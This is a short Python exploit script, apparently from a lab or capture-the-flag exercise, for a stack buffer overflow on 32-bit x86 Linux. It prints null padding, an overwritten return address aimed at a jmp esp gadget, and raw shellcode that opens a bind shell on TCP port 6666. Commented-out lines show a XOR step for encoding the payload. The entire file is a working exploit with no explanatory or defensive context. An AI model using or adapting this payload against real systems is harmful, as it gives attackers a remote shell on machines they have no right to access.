#!/usr/bin/env python

import sys

BUFSIZE = 4972

dummy = BUFSIZE * '\x00'

shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x1a\x0a\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

jmp_esp = "\x1c\x86\x04\x08"    # 0x0804861c inserted at addr 0xbffff8fc of
                                # stack where holds value 0x080488cc

alll = dummy + jmp_esp + shellcode

# alll = [e for e in alll]

# alll = [ord(e) for e in alll]

# alll = [alll[i] ^ 0x42 if alll[i] != 0x00 and alll[i] != 0x0a and i < BUFSIZE else alll[i] for i in range(len(alll))]

# alll = [chr(e) for e in alll]

ret = ''

for e in alll:
  ret += e

print(ret)

sys.stdout.flush()
